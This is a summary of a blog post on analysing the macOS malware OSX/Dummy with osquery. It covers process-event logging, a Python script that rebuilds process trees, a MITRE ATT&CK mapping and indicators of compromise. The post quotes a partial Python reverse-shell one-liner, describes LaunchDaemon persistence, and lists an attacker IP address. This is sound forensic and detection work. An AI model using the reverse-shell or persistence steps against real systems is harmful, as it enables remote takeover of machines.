Mac malware analysis using osquery

Osquery turns the OS into a SQL database to enable cross-platform malware analysis, and this post demonstrates how to use it for macOS malware analysis (OSX/Dummy). It also compares osquery with sandboxing and walks through a real-world analysis showing how to enable event logging, reconstruct a process tree, and trace artifacts left by OSX/Dummy. #osquery #OSXDummy #LaunchDaemons #com.startup.plist #Xpcproxy #Python #UnixShell

Keypoints

  • Osquery exposes the operating system as a SQL database, enabling malware analysis and intrusion detection across platforms (e.g., macOS in this article).
  • Compared to sandboxing, osquery can record file, socket, and process events, but building a full parent-child process tree requires extra steps.
  • Event collection in osquery is not enabled by default; the audit-based process_events table only starts recording after the event and audit settings are switched on in the configuration.
  • The OSX/Dummy malware analysis demonstrates enabling process events, using osqueryi to inspect process_events, and deriving a process tree from pid/parent relationships.
  • The analysis reveals specific malware artifacts and behaviors: writing a script, moving it, adjusting ownership/permissions, using launchd/LaunchDaemons for persistence, and executing via launchctl and Xpcproxy.
  • The workflow includes exporting line-mode SQL results and a Python script to reconstruct the parent-child process relationships, illustrating a practical osquery-based dynamic analysis on macOS.
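The tree-reconstruction step described in the last point, as an added example that is not the blog's own script: it parses `osqueryi` output captured in `.mode line` (one `column = value` line per field, rows separated by blank lines) from a query such as `SELECT pid, parent, path, cmdline FROM process_events;`, then links each event to its parent by pid. The sample rows are constructed to mirror the launchd → xpcproxy → sh → python → sh chain the write-up describes; real output will contain many more rows, and the event table must already be enabled (the article covers that, e.g. via the disable_events/disable_audit flags, which is an assumption here).

```python
"""Reconstruct a parent/child process tree from osqueryi `.mode line` output.

Added example (not the blog's script). Assumes process_events is enabled and
the analyst saved `SELECT pid, parent, path, cmdline FROM process_events;`
output in line mode.
"""
import re
from collections import defaultdict

# Constructed sample output; pids and paths are made up for illustration.
SAMPLE_LINE_MODE = """\
      pid = 1
   parent = 0
     path = /sbin/launchd
  cmdline = /sbin/launchd

      pid = 410
   parent = 1
     path = /usr/libexec/xpcproxy
  cmdline = xpcproxy com.startup

      pid = 411
   parent = 410
     path = /bin/sh
  cmdline = /bin/sh /var/root/script.sh

      pid = 412
   parent = 411
     path = /usr/bin/python
  cmdline = python -c import socket,subprocess,os;<one-liner continues>

      pid = 413
   parent = 412
     path = /bin/sh
  cmdline = /bin/sh -i
"""

# `.mode line` prints right-justified column names, then " = ", then the value.
ROW_RE = re.compile(r"^\s*(\w+)\s*=\s*(.*)$")


def parse_line_mode(text):
    """Parse `.mode line` output into a list of dict rows (one per event)."""
    rows, current = [], {}
    for line in text.splitlines():
        if not line.strip():          # blank line terminates a row
            if current:
                rows.append(current)
                current = {}
            continue
        m = ROW_RE.match(line)
        if m:
            current[m.group(1)] = m.group(2).strip()
    if current:
        rows.append(current)
    return rows


def build_tree(rows):
    """Index rows by pid and group child pids under each parent pid."""
    by_pid, children = {}, defaultdict(list)
    for r in rows:
        pid, parent = int(r["pid"]), int(r["parent"])
        by_pid[pid] = r
        children[parent].append(pid)
    return children, by_pid


def roots(children, by_pid):
    """Pids whose parent never appears in the event set (tree starting points)."""
    return sorted(p for p in by_pid if int(by_pid[p]["parent"]) not in by_pid)


def render(children, by_pid, pid, depth=0, out=None):
    """Depth-first listing, indented two spaces per level."""
    out = [] if out is None else out
    r = by_pid[pid]
    out.append(f"{'  ' * depth}{pid} {r['path']}  [{r['cmdline']}]")
    for child in sorted(children.get(pid, [])):
        render(children, by_pid, child, depth + 1, out)
    return out


def ancestry(by_pid, pid):
    """Walk parent pointers upward: answers 'what spawned this shell?'."""
    chain = []
    while pid in by_pid:
        chain.append(pid)
        pid = int(by_pid[pid]["parent"])
    return chain


if __name__ == "__main__":
    rows = parse_line_mode(SAMPLE_LINE_MODE)
    children, by_pid = build_tree(rows)
    for root in roots(children, by_pid):
        print("\n".join(render(children, by_pid, root)))
    print("ancestry of 413:", ancestry(by_pid, 413))
```

Run it against a saved capture by replacing `SAMPLE_LINE_MODE` with the file contents; `ancestry()` is the quick check for a suspicious interactive shell, since a `/bin/sh -i` whose chain leads back through xpcproxy to launchd points at a LaunchDaemon rather than a user's terminal session.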

MITRE Techniques

  • [T1543.003] Create or Modify System Process: Launch Daemons – The malware adds a property list file in /Library/LaunchDaemons/ for persistence and uses LaunchDaemons/Launchd to run the script. ‘For persistence, this malware added a property list file in /Library/LaunchDaemons/.’
  • [T1218.005] Signed Binary Proxy Execution: XPC – Xpcproxy launches the script.sh. ‘Xpcproxy launches the script.sh’
  • [T1059.006] Command and Scripting Interpreter: Python – The Python reverse shell is invoked via a -c payload. ‘python -c import socket,subprocess,os; s=socket.socket(…); p=subprocess.call(["/bin/sh","-i"]);’
  • [T1059.004] Command and Scripting Interpreter: Unix Shell – The malware uses /bin/sh -i as part of the reverse shell. ‘p=subprocess.call(["/bin/sh","-i"])’
  • [T1057] Process Discovery – The malware uses the ps command to list the running processes. ‘The malware uses the ps command to list the running processes’
  • [T1222] File and Directory Permissions Modification – The malware changes the ownership of the script to root using chown. ‘The malware changes the ownership of the script to root using chown command’
  • [T1569.002] System Services: Service Execution – The malware uses launchctl to run the script.sh (com.startup.plist is for script.sh). ‘The malware uses the launchctl to run the script.sh’

Indicators of Compromise

  • [File] context – /tmp/script.sh, /var/root/script.sh, and /Library/LaunchDaemons/com.startup.plist
  • [Directory] context – /Library/LaunchDaemons/
  • [File] context – /etc/security/audit_control
  • [IP Address] context – 185.243.115.230

Read more: https://www.uptycs.com/blog/malware-analysis-using-osquery